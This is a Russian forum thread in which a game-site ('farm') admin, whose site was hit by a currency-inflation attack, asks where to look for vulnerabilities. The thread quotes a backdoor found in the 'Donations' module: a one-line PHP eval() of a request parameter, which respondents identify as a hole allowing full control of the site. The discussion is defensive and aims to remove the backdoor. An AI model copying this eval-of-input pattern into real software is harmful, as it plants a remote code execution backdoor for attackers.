nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
GLookin
Участник
- Сообщения
- 296
- Реакции
- 62
Во всех. Если есть, хотя бы в одном из них уязвимость на SQL-инъекции, то через нее можно спокойно накрутить серебро.nikitin2016 написал(а):Коллеги админы ферм , не давно один упырь мне серебро накрутил в ферме и на вывод и на покупки, пользователя естественно забанил к чертям , но... подскажите ! В каких файлах прежде всего смотреть на стандартной ферме , чтобы устранить эти уязвимости ?
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Скажите пожалуйста, вот нашел этот как мне показалось странный код в модуле "Пожертвования" это уязвимость или нет ? Вроде проверил пожертвования проходят норм без этого кодаGLookin написал(а):Во всех. Если есть, хотя бы в одном из них уязвимость на SQL-инъекции, то через нее можно спокойно накрутить серебро.
код :
if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
GLookin
Участник
- Сообщения
- 296
- Реакции
- 62
Да, это дыра.nikitin2016 написал(а):Скажите пожалуйста, вот нашел этот как мне показалось странный код в модуле "Пожертвования" это уязвимость или нет ? Вроде проверил пожертвования проходят норм без этого кода
код :
if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
Еще в файле TOP админки есть, насколько помню.
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
этой дырой можно было серебро накрутить ? А то мне накрутили миллионы серебра уроды !GLookin написал(а):Да, это дыра.
Еще в файле TOP админки есть, насколько помню.
- Сообщения
- 322
- Реакции
- 72
Этой дырой можно все что угодно сделать с твоей фермой.nikitin2016 написал(а):этой дырой можно было серебро накрутить ? А то мне накрутили миллионы серебра уроды !